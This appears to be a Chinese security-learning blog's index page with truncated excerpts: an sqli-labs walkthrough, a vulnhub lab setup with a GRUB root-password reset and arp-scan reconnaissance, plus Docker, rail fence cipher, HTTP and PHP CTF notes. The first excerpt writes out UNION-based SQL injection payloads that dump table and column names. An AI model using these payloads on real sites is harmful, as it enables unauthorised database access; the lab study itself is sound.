wolke

第一关：GET-报错注入-单引号-字符型注入1.1 判断闭合方式 id=1\可以知道为单引号闭合 id=1'--+验证成功 1.2 查看有多少列 id=1' order by 3--+用二分法知道有3列 1.3 使用联合报错注入 id=-1' union select 1,2,3--+使前面报错，使用union报错注入，让后面的结果显示出来，发现2和3的位置可以显示出数据来 id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),database()--+ 知道当前数据库security有emails、referers、uagents、users表 id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_ ...

一、靶机说明1、下载链接  靶场镜像：链接: https://pan.baidu.com/s/1xfKILyIzELi_ZgUw4aXT7w 提取码: 59g0 2、靶机准备（1）重置靶场密码  重启主机，长按shift，进入如下界面后，按e   找到linux开头的行，在最后输入 init=/bin/bash，输入完成后按Crtl+X   mount -o rw,remount /，回车   passwd root，重置密码   如果提示改变密码成功，重启该虚拟机 （2）查看IP  使用刚才修改的密码进入靶场主机，输入ip a，查看IP地址 二、信息收集1、发现靶机IP  可以使用以下两种方法：arp-scan和netdiscover （1）arp-scan  使用arp-scan探索靶机IP，发现IP地址为192.168.43.165 arp-scan -l （2）netdiscover& ...

一、Docker为什么会出现  一款产品：开发👉上线 经常需要两套环境！需要对其进行部署应用环境和应用配置。那么就有了开发人员和运维人员   问题：我在我的电脑上可以运行！但是在你的电脑就不能运行！或者版本更新，导致服务不可用！对于运维来说，考验就十分大，环境配置是十分的麻烦，每一个机器都要部署环境（集群Redis、ES、Hadoop）！费时费力。发布一个项目（jar+（Redis MySQL jdk ES）），项目能不能都带上环境安装打包？   Docker的思想就来自于集装箱   隔离：Docker核心思想！打包装箱！每个箱子都是互相隔离的。利用隔离机制可以将服务器利用到极致！比如多个应用都是都是交叉的，可能会有端口冲突，如果使用了Docker就会隔离起来，不会造成端口冲突   本质：所有的技术都是因为出现了一些问题，我们需要去解决，才去学习！ 二、Docker的历史  2010年，几个搞IT的年轻人，就在美国成立了一家公司 dotCloud ，做一些paas ...

一、介绍  The rail fence cipher，所谓栅栏密码，就是把要加密的明文分成N个一组，然后把每组的第1个字连起来，形成一段无规律的话。 不过栅栏密码本身有一个潜规则，就是组成栅栏的字母一般不会太多。（一般不超过30个，也就是一、两句话） 二、加密原理 把将要传递的信息中的字母交替排成上下两行。 再将下面一行字母排在上面一行的后边，从而形成一段密码。 三、例子  把将要传递的信息中的字母交替排成上下两行。 T E O G S D Y U T A E N NH L N E T A M S H V A E D   密文：将下面一行字母排在上面一行的后边。 TEOGSDYUTAENN HLNETAMSHVAED   解密：先将密文分为两行 T E O G S D Y U T A E N NH L N E T A M S H V A E D   再按上下上下的顺序组合成一句话   明文： THE LONGEST DAY MUST HAVE AN EN ...

一、网站解析对应  涉及到的攻击层面？（源码，搭建平台，系统，网络层等）   涉及到的安全问题？（目录，敏感文件，弱口令，IP 及域名等） 二、HTTP/HTTPS数据包 三、HTTP/HTTPS具体区别3.1 HTTP简要通信过程  建立连接–>发送请求数据包–>返回相应数据包–>关闭连接 浏览器建立与Web服务器之间的连接 浏览器将请求数据打包（生成请求数据包）并发送到Web服务器 Web服务器将处理结果打包（生成相应数据包）并发送给浏览器 Web服务器关闭连接 3.2 HTTPS简要通信过程（见图） 四、Request请求数据包数据格式 请求行：请求类型/请求资源路径、版本的协议和类型 请求头：一些键值对，浏览器与Web服务器之间都可以发送，特定的某种含义 空行：请求头与请求体之间用一个空行隔开 请求体：要发送的数据（一般POST提交会使用）；例：user=123&pas=123 例： # Request HeadersPOST /adduser HTTP/1.1Host: ...

一、考察方向 PHP的$GLOBALS 正则表达式 二、PHP预备知识——$GLOBALS  其中提示flag在变量中 “flag In the variable !” ，这里要普及一个PHP中特殊的变量   $GLOBALS —— 引用全局作用域中可用的全部变量。   说明：一个包含了全部变量的全局组合数组。变量的名字就是数组的键。   示例： #示例代码<?phpfunction test() { $foo = "local variable"; echo '$foo in global scope: ' . $GLOBALS["foo"] . "\n"; echo '$foo in current scope: ' . $foo . "\n";}$foo = "Example content";test();?> ...